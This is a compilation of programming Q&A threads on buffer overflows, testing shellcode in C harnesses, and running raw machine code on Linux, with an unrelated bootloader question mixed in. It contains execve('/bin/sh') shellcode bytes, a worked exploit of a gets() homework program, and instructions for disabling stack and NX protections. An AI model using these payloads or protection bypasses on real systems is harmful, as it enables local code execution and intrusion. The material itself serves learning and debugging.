Buffer overflow, not expected result - c

Hi I am learning about Buffer Overflow. For better understanding I wrote one small code to check what is happening, but i did not find anything wrong.
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
And Output :
[krishna]$ gcc -o testsc testsc.c
[krishna]$ ./testsc
$ exit
[krishna]$
Why it is exit? Any other way I can check what happening inside when my program is executing.
What else I can try if my approach is not good enough?

Assigning a pointer isn't the same as copying a buffer. You probably meant:
memcpy(ret, shellcode, sizeof(shellcode));
However this isn't a buffer overflow either. In this case you will attempt to write to the readonly code pages of the program, so you will get an signal or system exception of some type.

I know this doesn't answer the question but it lets you know what the shellcode does
Your best bet would be to run test program in a disassembler like ollydbg or IDA PRO and breakpoint line by line to see what it does exactly.
I used ConvertShellcode 2.0 which shows the shellcode as assembly and here is what it looks like
Download link to ConvertShellcode.exe http://www.mediafire.com/?rnnqjdyv0nbency
Usage.
ConvertShellcode.exe \xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3
ConvertShellcode 2.0
Copyright (C) 2009 Alain Rioux. All rights reserved.
Assembly language source code :
***************************************
00000000 jmp 0x2c
00000002 pop esi
00000003 mov dword[esi+0x8],esi
00000006 mov byte[esi+0x7],0x0
0000000a mov dword[esi+0xc],0x0
00000011 mov eax,0xb
00000016 mov ebx,esi
00000018 lea ecx,[esi+0x8]
0000001b lea edx,[esi+0xc]
0000001e int 0x80
00000020 mov eax,0x1
00000025 mov ebx,0x0
0000002a int 0x80
0000002c call 0x2
00000031 das
00000032 bound ebp,qword[ecx+0x6e]
00000035 das
00000036 jae 0xa0

You can use gdb for debugging and understanding what is happening inside.
gcc -g -o testsc testsc.c
gdb testsc
(gdb)break main
(gdb)print ret
(gdb)print *ret
and go step by step through the code.
Meanwhile you can view the disassembled code by using readelf/objdump
In another terminal,
objdump -xsd testsc
And use the convert shell code as mentioned by SSpoke to see what the shell code will look like in assembly.
Also have a look at assembler code by using
gcc -S testsc.c

Why it is exit?
sh prints exit if input is at EOF, for example when Ctrl D has been pressed; if you didn't do that, there must be some other reason for the EOF.
Any other way I can check what happening inside when my program is
executing.
Since your program has already successfully executed /bin/sh, I see no point in checking inside your program with a debugger. I'd look at the output of strace testsc (that also traces the shell); near the end we should see a read call which is supposed to get command line input for sh; perhaps from the returned value and error number we can deduce the reason for the EOF, or we could see where the used file descriptor comes from.
By the way, your program compiled with gcc 2.95.3 (x86) works without sh exiting immediately.

buffer overflow?
char a[8];
strcpy(a, "0123456789");

Related

How to fix " Infinite Loop error on jumping to C code from bootloader"

I am actually trying to run C code to write my operating system kernel for studying how operating systems work. I am stuck on this infinite loop when the bootloader jumps to my C code. How should I prevent this error
Although my bootloader works correctly the problem comes when my bootloader jumps to the kernel code written in C as a.COM program. The main thing is that the dummy code just keeps on printing a character again and again although the code must run only once. It seems as if the main code is being called again and again. Here is the code for the startpoint.asm assembly header and bootmain.cpp file.
Here is the code for startpoint.asm which is used while linking at first so that the code can be invoked automatically. (Written in MASM )
Note: The code is loaded at the address 2000H:0000H.
;------------------------------------------------------------
.286 ; CPU type
;------------------------------------------------------------
.model TINY ; memory of model
;---------------------- EXTERNS -----------------------------
extrn _BootMain:near ; prototype of C func
;------------------------------------------------------------
;------------------------------------------------------------
.code
main:
jmp short start ; go to main
nop
;----------------------- CODE SEGMENT -----------------------
start:
cli
mov ax,cs ; Setup segment registers
mov ds,ax ; Make DS correct
mov es,ax ; Make ES correct
mov ss,ax ; Make SS correct
mov bp,2000h
mov sp,2000h ; Setup a stack
sti
; start the program
call _BootMain
ret
END main ; End of prog
Code for bootmain.cpp
extern "C" void BootMain()
{
__asm
{
mov ah,0EH
mov al,'G'
int 10H
}
return;
}
The compiling and linker commands are as follows:
Code to compile bootmain.cpp:
CL.EXE /AT /G2 /Gs /Gx /c /Zl bootmain.cpp
Code to compile startpoint.asm:
ML.EXE /AT /c startpoint.asm
Code to link them both (In preserved order):
LINK.EXE /T /NOD startPoint.obj bootmain.obj
Expected output:
G
Actual Output:
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
Take a closer look at the end of start.
start is never called -- it is jumped to directly, and it sets up the stack itself. When _BootMain returns, the stack is empty; the ret at the end of start will pop garbage data from above the end of the stack and attempt to jump to it. If that memory contains zeroes, program flow will return to main.
You need to set up something specific to happen after _BootMain returns. If you just want the system to hang after executing _BootMain, insert an infinite loop (e.g. jmp .) to the end of start instead of the erroneous ret.
Alternatively, consider having your bootloader set up the stack itself and call the COM executable. When that returns, the bootloader can take appropriate action.

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!

Difference between running an assembly program and running the disassembled code in shellcode.c

I am currently working on 'Pentester Academy's x86_64 Assembly Language and Shellcoding on Linux' course (www.pentesteracademy.com/course?id=7). I have one simple question that I can't quite figure out: what is the exact difference between running an assembly program that has been assembled and linked with NASM and ld vs. running the same disassembled program in the classic shellcode.c program (written below). Why use one method over the other?
As an example, when following the first method, I use the commands :
nasm -f elf64 -o execve_stack.o execve_stack.asm
ld -o execve_stack execve_stack.o
./execve_stack
When using the second method, I insert the disassembled shellcode in the shellcode.c program:
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
int main(void) {
printf("Shellcode length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}
... and use the commands:
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
./shellcode
I have analyzed both programs in GDB and found that addresses stored in certain registers differ. I have also read the answer to the following question (C code explanation), which helped me understand the way the shellcode.c program works. Having said that, I still don't fully understand the exact way in which these two methods differ.
There is no theoretical difference between the two methods. In both you end up executing a bunch of assembly instructions on the processor.
The shellcode.c program is there to just demonstrate what would happen if you run the assembly defined as an array of bytes in the unsigned char code[] variable.
Why use one method over the other?
I think you don't understand the purpose of shellcodes and the reasoning behind the shellcode.c program (why it shows what happens when an arbitrary sequence of bytes you have control on is executed on the processor).
A shellcode is a small piece of assembly code that is used to exploit a software vulnerability. An attacker usually injects a shellcode into software by taking advantage of common programming errors such as buffer overflows and then tries to make the software execute that injected shellcode.
A good article showing a step-by-step tutorial on how to generate a shell by performing shellcode injection using buffer overflows can be found here.
Here is how a classic shellcode \x83\xec\x48\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 looks like in assembler:
sub esp, 72
xor eax, eax
xor edx, edx
push eax
push 0x68732f2f ; "hs//" (/ is doubled because you need to push 4 bytes on the stack)
push 0x6e69622f ; "nib/"
mov ebx, esp ; EBX = address of string "/bin//sh"
push eax
push ebx
mov ecx, esp
mov al, 0xb ; EAX = 11 (which is the ID of the sys_execve Linux system call)
int 0x80
In an x86 environment, this does an execve system call with the "/bin/sh" string as parameter.

How to get c code to execute hex machine code?

I want a simple C method to be able to run hex bytecode on a Linux 64 bit machine. Here's the C program that I have:
char code[] = "\x48\x31\xc0";
#include <stdio.h>
int main(int argc, char **argv)
{
int (*func) ();
func = (int (*)()) code;
(int)(*func)();
printf("%s\n","DONE");
}
The code that I am trying to run ("\x48\x31\xc0") I obtained by writting this simple assembly program (it's not supposed to really do anything)
.text
.globl _start
_start:
xorq %rax, %rax
and then compiling and objdump-ing it to obtain the bytecode.
However, when I run my C program I get a segmentation fault. Any ideas?
Machine code has to be in an executable page. Your char code[] is in the read+write data section, without exec permission, so the code cannot be executed from there.
Here is a simple example of allocating an executable page with mmap:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main ()
{
char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi]
0xC3 // ret
};
int (*sum) (int, int) = NULL;
// allocate executable buffer
sum = mmap (0, sizeof(code), PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
// copy code to buffer
memcpy (sum, code, sizeof(code));
// doesn't actually flush cache on x86, but ensure memcpy isn't
// optimized away as a dead store.
__builtin___clear_cache (sum, sum + sizeof(sum)); // GNU C
// run code
int a = 2;
int b = 3;
int c = sum (a, b);
printf ("%d + %d = %d\n", a, b, c);
}
See another answer on this question for details about __builtin___clear_cache.
Until recent Linux kernel versions (sometime before 5.4), you could simply compile with gcc -z execstack - that would make all pages executable, including read-only data (.rodata), and read-write data (.data) where char code[] = "..." goes.
Now -z execstack only applies to the actual stack, so it currently works only for non-const local arrays. i.e. move char code[] = ... into main.
See Linux default behavior against `.data` section for the kernel change, and Unexpected exec permission from mmap when assembly files included in the project for the old behaviour: enabling Linux's READ_IMPLIES_EXEC process for that program. (In Linux 5.4, that Q&A shows you'd only get READ_IMPLIES_EXEC for a missing PT_GNU_STACK, like a really old binary; modern GCC -z execstack would set PT_GNU_STACK = RWX metadata in the executable, which Linux 5.4 would handle as making only the stack itself executable. At some point before that, PT_GNU_STACK = RWX did result in READ_IMPLIES_EXEC.)
The other option is to make system calls at runtime to copy into an executable page, or change permissions on the page it's in. That's still more complicated than using a local array to get GCC to copy code into executable stack memory.
(I don't know if there's an easy way to enable READ_IMPLIES_EXEC under modern kernels. Having no GNU-stack attribute at all in an ELF binary does that for 32-bit code, but not 64-bit.)
Yet another option is __attribute__((section(".text"))) const char code[] = ...;
Working example: https://godbolt.org/z/draGeh.
If you need the array to be writeable, e.g. for shellcode that inserts some zeros into strings, you could maybe link with ld -N. But probably best to use -z execstack and a local array.
Two problems in the question:
exec permission on the page, because you used an array that will go in the noexec read+write .data section.
your machine code doesn't end with a ret instruction so even if it did run, execution would fall into whatever was next in memory instead of returning.
And BTW, the REX prefix is totally redundant. "\x31\xc0" xor eax,eax has exactly the same effect as xor rax,rax.
You need the page containing the machine code to have execute permission. x86-64 page tables have a separate bit for execute separate from read permission, unlike legacy 386 page tables.
The easiest way to get static arrays to be in read+exec memory was to compile with gcc -z execstack. (Used to make the stack and other sections executable, now only the stack).
Until recently (2018 or 2019), the standard toolchain (binutils ld) would put section .rodata into the same ELF segment as .text, so they'd both have read+exec permission. Thus using const char code[] = "..."; was sufficient for executing manually-specified bytes as data, without execstack.
But on my Arch Linux system with GNU ld (GNU Binutils) 2.31.1, that's no longer the case. readelf -a shows that the .rodata section went into an ELF segment with .eh_frame_hdr and .eh_frame, and it only has Read permission. .text goes in a segment with Read + Exec, and .data goes in a segment with Read + Write (along with the .got and .got.plt). (What's the difference of section and segment in ELF file format)
I assume this change is to make ROP and Spectre attacks harder by not having read-only data in executable pages where sequences of useful bytes could be used as "gadgets" that end with the bytes for a ret or jmp reg instruction.
// TODO: use char code[] = {...} inside main, with -z execstack, for current Linux
// Broken on recent Linux, used to work without execstack.
#include <stdio.h>
// can be non-const if you use gcc -z execstack. static is also optional
static const char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi] // retval = a+b;
0xC3 // ret
};
static const char ret0_code[] = "\x31\xc0\xc3"; // xor eax,eax ; ret
// the compiler will append a 0 byte to terminate the C string,
// but that's fine. It's after the ret.
int main () {
// void* cast is easier to type than a cast to function pointer,
// and in C can be assigned to any other pointer type. (not C++)
int (*sum) (int, int) = (void*)code;
int (*ret0)(void) = (void*)ret0_code;
// run code
int c = sum (2, 3);
return ret0();
}
On older Linux systems: gcc -O3 shellcode.c && ./a.out (Works because of const on global/static arrays)
On Linux before 5.5 (or so) gcc -O3 -z execstack shellcode.c && ./a.out (works because of -zexecstack regardless of where your machine code is stored). Fun fact: gcc allows -zexecstack with no space, but clang only accepts clang -z execstack.
These also work on Windows, where read-only data goes in .rdata instead of .rodata.
The compiler-generated main looks like this (from objdump -drwC -Mintel). You can run it inside gdb and set breakpoints on code and ret0_code
(I actually used gcc -no-pie -O3 -zexecstack shellcode.c hence the addresses near 401000
0000000000401020 <main>:
401020: 48 83 ec 08 sub rsp,0x8 # stack aligned by 16 before a call
401024: be 03 00 00 00 mov esi,0x3
401029: bf 02 00 00 00 mov edi,0x2 # 2 args
40102e: e8 d5 0f 00 00 call 402008 <code> # note the target address in the next page
401033: 48 83 c4 08 add rsp,0x8
401037: e9 c8 0f 00 00 jmp 402004 <ret0_code> # optimized tailcall
Or use system calls to modify page permissions
Instead of compiling with gcc -zexecstack, you can instead use mmap(PROT_EXEC) to allocate new executable pages, or mprotect(PROT_EXEC) to change existing pages to executable. (Including pages holding static data.) You also typically want at least PROT_READ and sometimes PROT_WRITE, of course.
Using mprotect on a static array means you're still executing the code from a known location, maybe making it easier to set a breakpoint on it.
On Windows you can use VirtualAlloc or VirtualProtect.
Telling the compiler that data is executed as code
Normally compilers like GCC assume that data and code are separate. This is like type-based strict aliasing, but even using char* doesn't make it well-defined to store into a buffer and then call that buffer as a function pointer.
In GNU C, you also need to use __builtin___clear_cache(buf, buf + len) after writing machine code bytes to a buffer, because the optimizer doesn't treat dereferencing a function pointer as reading bytes from that address. Dead-store elimination can remove the stores of machine code bytes into a buffer, if the compiler proves that the store isn't read as data by anything. https://codegolf.stackexchange.com/questions/160100/the-repetitive-byte-counter/160236#160236 and https://godbolt.org/g/pGXn3B has an example where gcc really does do this optimization, because gcc "knows about" malloc.
(And on non-x86 architectures where I-cache isn't coherent with D-cache, it actually will do any necessary cache syncing. On x86 it's purely a compile-time optimization blocker and doesn't expand to any instructions itself.)
Re: the weird name with three underscores: It's the usual __builtin_name pattern, but name is __clear_cache.
My edit on #AntoineMathys's answer added this.
In practice GCC/clang don't "know about" mmap(MAP_ANONYMOUS) the way they know about malloc. So in practice the optimizer will assume that the memcpy into the buffer might be read as data by the non-inline function call through the function pointer, even without __builtin___clear_cache(). (Unless you declared the function type as __attribute__((const)).)
On x86, where I-cache is coherent with data caches, having the stores happen in asm before the call is sufficient for correctness. On other ISAs, __builtin___clear_cache() will actually emit special instructions as well as ensuring the right compile-time ordering.
It's good practice to include it when copying code into a buffer because it doesn't cost performance, and stops hypothetical future compilers from breaking your code. (e.g. if they do understand that mmap(MAP_ANONYMOUS) gives newly-allocated anonymous memory that nothing else has a pointer to, just like malloc.)
With current GCC, I was able to provoke GCC into really doing an optimization we don't want by using __attribute__((const)) to tell the optimizer sum() is a pure function (that only reads its args, not global memory). GCC then knows sum() can't read the result of the memcpy as data.
With another memcpy into the same buffer after the call, GCC does dead-store elimination into just the 2nd store after the call. This results in no store before the first call so it executes the 00 00 add [rax], al bytes, segfaulting.
// demo of a problem on x86 when not using __builtin___clear_cache
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main ()
{
char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi]
0xC3 // ret
};
__attribute__((const)) int (*sum) (int, int) = NULL;
// copy code to executable buffer
sum = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANON,-1,0);
memcpy (sum, code, sizeof(code));
//__builtin___clear_cache(sum, sum + sizeof(code));
int c = sum (2, 3);
//printf ("%d + %d = %d\n", a, b, c);
memcpy(sum, (char[]){0x31, 0xc0, 0xc3, 0}, 4); // xor-zero eax, ret, padding for a dword store
//__builtin___clear_cache(sum, sum + 4);
return sum(2,3);
}
Compiled on the Godbolt compiler explorer with GCC9.2 -O3
main:
push rbx
xor r9d, r9d
mov r8d, -1
mov ecx, 34
mov edx, 7
mov esi, 4
xor edi, edi
sub rsp, 16
call mmap
mov esi, 3
mov edi, 2
mov rbx, rax
call rax # call before store
mov DWORD PTR [rbx], 12828721 # 0xC3C031 = xor-zero eax, ret
add rsp, 16
pop rbx
ret # no 2nd call, CSEd away because const and same args
Passing different args would have gotten another call reg, but even with __builtin___clear_cache the two sum(2,3) calls can CSE. __attribute__((const)) doesn't respect changes to the machine code of a function. Don't do it. It's safe if you're going to JIT the function once and then call many times, though.
Uncommenting the first __clear_cache results in
mov DWORD PTR [rax], -1019804531 # lea; ret
call rax
mov DWORD PTR [rbx], 12828721 # xor-zero; ret
... still CSE and use the RAX return value
The first store is there because of __clear_cache and the sum(2,3) call. (Removing the first sum(2,3) call does let dead-store elimination happen across the __clear_cache.)
The second store is there because the side-effect on the buffer returned by mmap is assumed to be important, and that's the final value main leaves.
Godbolt's ./a.out option to run the program still seems to always fail (exit status of 255); maybe it sandboxes JITing? It works on my desktop with __clear_cache and crashes without.
mprotect on a page holding existing C variables.
You can also give a single existing page read+write+exec permission. This is an alternative to compiling with -z execstack
You don't need __clear_cache on a page holding read-only C variables because there's no store to optimize away. You would still need it for initializing a local buffer (on the stack). Otherwise GCC will optimize away the initializer for this private buffer that a non-inline function call definitely doesn't have a pointer to. (Escape analysis). It doesn't consider the possibility that the buffer might hold the machine code for the function unless you tell it that via __builtin___clear_cache.
#include <stdio.h>
#include <sys/mman.h>
#include <stdint.h>
// can be non-const if you want, we're using mprotect
static const char code[] = {
0x8D, 0x04, 0x37, // lea eax,[rdi+rsi] // retval = a+b;
0xC3 // ret
};
static const char ret0_code[] = "\x31\xc0\xc3";
int main () {
// void* cast is easier to type than a cast to function pointer,
// and in C can be assigned to any other pointer type. (not C++)
int (*sum) (int, int) = (void*)code;
int (*ret0)(void) = (void*)ret0_code;
// hard-coding x86's 4k page size for simplicity.
// also assume that `code` doesn't span a page boundary and that ret0_code is in the same page.
uintptr_t page = (uintptr_t)code & -4095ULL; // round down
mprotect((void*)page, 4096, PROT_READ|PROT_EXEC|PROT_WRITE); // +write in case the page holds any writeable C vars that would crash later code.
// run code
int c = sum (2, 3);
return ret0();
}
I used PROT_READ|PROT_EXEC|PROT_WRITE in this example so it works regardless of where your variable is. If it was a local on the stack and you left out PROT_WRITE, call would fail after making the stack read only when it tried to push a return address.
Also, PROT_WRITE lets you test shellcode that self-modifies, e.g. to edit zeros into its own machine code, or other bytes it was avoiding.
$ gcc -O3 shellcode.c # without -z execstack
$ ./a.out
$ echo $?
0
$ strace ./a.out
...
mprotect(0x55605aa3f000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
exit_group(0) = ?
+++ exited with 0 +++
If I comment out the mprotect, it does segfault with recent versions of GNU Binutils ld which no longer put read-only constant data into the same ELF segment as the .text section.
If I did something like ret0_code[2] = 0xc3;, I would need __builtin___clear_cache(ret0_code+2, ret0_code+2) after that to make sure the store wasn't optimized away, but if I don't modify the static arrays then it's not needed after mprotect. It is needed after mmap+memcpy or manual stores, because we want to execute bytes that have been written in C (with memcpy).
You need to include the assembly in-line via a special compiler directive so that it'll properly end up in a code segment. See this guide, for example: http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
Your machine code may be all right, but your CPU objects.
Modern CPUs manage memory in segments. In normal operation, the operating system loads a new program into a program-text segment and sets up a stack in a data segment. The operating system tells the CPU never to run code in a data segment. Your code is in code[], in a data segment. Thus the segfault.
This will take some effort.
Your code variable is stored in the .data section of your executable:
$ readelf -p .data exploit
String dump of section '.data':
[ 10] H1À
H1À is the value of your variable.
The .data section is not executable:
$ readelf -S exploit
There are 30 section headers, starting at offset 0x1150:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[...]
[24] .data PROGBITS 0000000000601010 00001010
0000000000000014 0000000000000000 WA 0 0 8
All 64-bit processors I'm familiar with support non-executable pages natively in the pagetables. Most newer 32-bit processors (the ones that support PAE) provide enough extra space in their pagetables for the operating system to emulate hardware non-executable pages. You'll need to run either an ancient OS or an ancient processor to get a .data section marked executable.
Because these are just flags in the executable, you ought to be able to set the X flag through some other mechanism, but I don't know how to do so. And your OS might not even let you have pages that are both writable and executable.
You may need to set the page executable before you may call it.
On MS-Windows, see the VirtualProtect -function.
URL: http://msdn.microsoft.com/en-us/library/windows/desktop/aa366898%28v=vs.85%29.aspx
Sorry, I couldn't follow above examples which are complicated.
So, I created an elegant solution for executing hex code from C.
Basically, you could use asm and .word keywords to place your instructions in hex format.
See below example:
asm volatile(".rept 1024\n"
CNOP
".endr\n");
where CNOP is defined as below:
#define ".word 0x00010001 \n"
Basically, c.nop instruction was not supported by my current assembler. So, I defined CNOP as the hex equivalent of c.nop with proper syntax and used inside asm, with which I was aware of.
.rept <NUM> .endr will basically, repeat the instruction NUM times.
This solution is working and verified.

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
void main()
{
int *ret;
ret = (int *)&ret + 2; // +2 to get to the return address on the stack
(*ret) = (int)shellcode;
}
Execution result in Segmentation error.
[user1#fedo BOF]$ gcc -o ExitShellCode ExitShellCode.c
[user1#fedo BOF]$ ./ExitShellCode
Segmentation fault (core dumped)
This is the Objdump of the shellcode.a
[user1#fedo BOF]$ objdump -d exitShellcodeaAss
exitShellcodeaAss: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: bb 14 00 00 00 mov $0x14,%ebx
8048059: b8 01 00 00 00 mov $0x1,%eax
804805e: cd 80 int $0x80
System I'm using
fedora Linux 3.1.2-1.fc16.i686
ASLR is disabled.
Debugging with GDB.
gcc version 4.6.2
mmm maybe it is to late to answer to this question, but they might be a passive syntax error. It seems like thet shellcode is malformed, I mean:
char shellcode[]= "/0xbb/0x14/0x00/0x00/0x00"
"/0xb8/0x01/0x00/0x00/0x00"
"/0xcd/0x80";
its not the same as:
char shellcode[]= "\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
although this fix won't help you solving this problem, but have you tried disabling some kernel protection mechanism like: NX bit, Stack Randomization, etc... ?
Based on two other questions, namely How to determine return address on stack? and C: return address of function (mac), i'm confident that you are not overwriting the correct address. This is basically caused due to your assumption, that the return address can be determined in the way you did it. But as the answer to thefirst question (1) states, this must not be the case.
Therefore:
Check if the address is really correct
Find a way for determining the correct return address, if you do not want to use the builtin GCC feature
You can also execute shellcode like in this scenario, by casting the buffer to a function like
(*(int(*)()) shellcode)();
If you want the shellcode be executed in the stack you must compile without NX (stack protector) and with correct permissions.
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
E.g.
#include <stdio.h>
#include <string.h>
const char code[] ="\xbb\x14\x00\x00\x00"
"\xb8\x01\x00\x00\x00"
"\xcd\x80";
int main()
{
printf("Length: %d bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
If you want to debug it with gdb:
[manu#debian /tmp]$ gdb ./shellcode
GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
...
Reading symbols from ./shellcode...(no debugging symbols found)...done.
(gdb) b *&code
Breakpoint 1 at 0x4005c4
(gdb) r
Starting program: /tmp/shellcode
Length: 2 bytes
Breakpoint 1, 0x00000000004005c4 in code ()
(gdb) disassemble
Dump of assembler code for function code:
=> 0x00000000004005c4 <+0>: mov $0x14,%ebx
0x00000000004005c9 <+5>: mov $0x1,%eax
0x00000000004005ce <+10>: int $0x80
0x00000000004005d0 <+12>: add %cl,0x6e(%rbp,%riz,2)
End of assembler dump.
In this proof of concept example is not important the null bytes. But when you are developing shellcodes you should keep in mind and remove the bad characters.
Shellcode cannot have Zeros on it. Remove the null characters.

Resources